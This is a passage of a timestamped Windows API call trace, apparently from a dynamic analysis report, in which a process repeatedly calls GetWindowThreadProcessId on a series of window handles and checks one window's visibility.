	[0492.903] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.903] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.903] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.903] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.903] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.903] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.903] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x460
	[0492.903] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.904] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.904] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1664
	[0492.904] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x10b4
	[0492.904] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x10ac
	[0492.904] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x10ec
	[0492.904] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1068
	[0492.904] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x17e0
	[0492.904] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x102c
	[0492.904] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x17a4
	[0492.904] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1050
	[0492.904] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1694
	[0492.905] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1770
	[0492.905] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1720
	[0492.905] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x165c
	[0492.905] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1578
	[0492.905] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x16c0
	[0492.905] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x161c
	[0492.905] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1638
	[0492.905] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x15c8
	[0492.905] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1554
	[0492.905] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1674
	[0492.905] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1520
	[0492.906] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x14bc
	[0492.906] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xf8c
	[0492.906] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xe9c
	[0492.906] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1434
	[0492.906] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x14ec
	[0492.906] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xfcc
	[0492.906] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x12ac
	[0492.906] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1484
	[0492.906] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x934
	[0492.906] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xc0c
	[0492.906] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xb08
	[0492.907] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x948
	[0492.907] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1178
	[0492.907] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x13e0
	[0492.907] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xcd0
	[0492.907] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x13fc
	[0492.907] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xdc8
	[0492.907] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xc18
	[0492.907] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xc2c
	[0492.907] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xa1c
	[0492.907] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1244
	[0492.907] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xdb0
	[0492.908] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1398
	[0492.908] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1358
	[0492.908] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1370
	[0492.908] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1340
	[0492.908] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x130c
	[0492.908] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x12c0
	[0492.908] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x12e4
	[0492.908] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1270
	[0492.908] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1298
	[0492.908] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x120c
	[0492.908] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x122c
	[0492.909] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x11c4
	[0492.909] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x11b0
	[0492.909] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1188
	[0492.909] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1148
	[0492.909] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1160
	[0492.909] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x10fc
	[0492.909] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xe34
	[0492.909] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xea4
	[0492.909] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x514
	[0492.909] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xe48
	[0492.910] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xbc8
	[0492.910] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xdf8
	[0492.910] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x318
	[0492.910] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xcac
	[0492.910] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x8bc
	[0492.910] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xf9c
	[0492.910] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xf48
	[0492.910] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xe40
	[0492.910] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xecc
	[0492.910] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xeb8
	[0492.910] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xe80
	[0492.911] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xe98
	[0492.911] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xe60
	[0492.911] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xee4
	[0492.911] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xf00
	[0492.911] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xdf0
	[0492.911] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xe1c
	[0492.911] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xdd0
	[0492.911] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xd94
	[0492.911] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xd74
	[0492.911] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xd00
	[0492.911] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xcd8
	[0492.912] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xc84
	[0492.912] GetWindow (hWnd=0x20240, uCmd=0x4) returned 0x0
	[0492.913] IsWindowVisible (hWnd=0x20240) returned 0
	[0492.913] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xca4
	[0492.913] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xc64
	[0492.913] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xc24
	[0492.913] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xb84
	[0492.914] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xbac
	[0492.914] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x384
	[0492.914] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xab8
	[0492.914] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x33c
	[0492.914] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xa44
	[0492.914] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xa64
	[0492.914] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x8a8
	[0492.914] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xaf0
	[0492.914] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x88c
	[0492.914] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xb04
	[0492.914] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x910
	[0492.915] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x230
	[0492.915] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xac0
	[0492.915] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xab4
	[0492.915] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xaac
	[0492.915] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x3d0
	[0492.915] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x978
	[0492.915] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xa7c
	[0492.915] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x59c
	[0492.915] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xa88
	[0492.915] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xa6c
	[0492.915] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xa68
	[0492.916] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x9f8
	[0492.916] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xa04
	[0492.916] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x924
	[0492.916] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x8dc
	[0492.916] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x7dc
	[0492.916] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x768
	[0492.916] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x764
	[0492.916] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x820
	[0492.916] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x810
	[0492.916] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x794
	[0492.916] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x83c
	[0492.917] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x7ac
	[0492.917] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xb44
	[0492.917] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xb5c
	[0492.917] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x838
	[0492.917] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.917] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.917] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.917] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.917] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.917] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.917] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.918] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.918] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x818
	[0492.918] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x5b8
	[0492.918] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x494
	[0492.918] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1ec
	[0492.918] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x440
	[0492.918] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x7e8
	[0492.918] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x730
	[0492.918] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x2c8
	[0492.918] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x31c
	[0492.919] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x330
	[0492.919] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x128
	[0492.919] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x5c8
	[0492.919] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x6f8
	[0492.919] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x358
	[0492.919] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x73c
	[0492.919] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xb0
	[0492.919] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x250
	[0492.919] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x240
	[0492.919] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x790
	[0492.919] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x61c
	[0492.920] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x540
	[0492.920] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x538
	[0492.920] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x568
	[0492.920] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x538
	[0492.920] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x568
	[0492.920] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x538
	[0492.920] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x540
	[0492.920] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x540
	[0492.920] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x57c
	[0492.920] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x460
	[0492.920] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x554
	[0492.921] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.921] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x528
	[0492.921] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.921] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.921] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.921] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x79c
	[0492.921] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.921] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4e0
	[0492.921] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.921] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x460
	[0492.921] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x460
	[0492.922] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x44c
	[0492.922] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x778
	[0492.922] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x460
	[0492.922] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x558
	[0492.922] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.922] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.922] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x10c4
	[0492.922] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x128c
	[0492.922] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x16e8
	[0492.922] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x16cc
	[0492.922] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x274
	[0492.923] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x10e0
	[0492.923] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x10cc
	[0492.923] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x10c0
	[0492.923] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x10d0
